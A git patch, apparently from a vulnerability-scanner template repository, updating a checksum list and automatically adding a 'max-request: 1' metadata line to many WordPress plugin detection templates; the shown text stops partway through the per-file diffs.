+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7199,7 +7199,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:30a84f287748d2dd14cc355fb0aafdb928d74d4a
+templates-checksum.txt:c845d212427365ed390bdce5d37323117b983e6c
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 20b7ed5bfaaebfe2a45230584223a014a6951ecc Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:32:45 +0000
Subject: [PATCH 0591/1090] TemplateMan Update [Fri Sep 29 05:32:45 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
